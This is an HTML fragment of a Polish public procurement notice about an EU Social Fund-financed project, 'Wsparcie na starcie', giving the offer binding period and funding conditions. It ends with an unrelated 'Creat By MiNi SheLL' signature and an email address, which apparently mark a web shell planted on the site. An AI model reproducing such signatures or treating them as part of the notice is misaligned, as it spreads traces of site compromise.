<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Wsparcie na starcie współfinansowany jest  przez Unię Europejską 
w ramach Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, 
Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji 
przez powiatowe centra pomocy rodzinie. 
Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com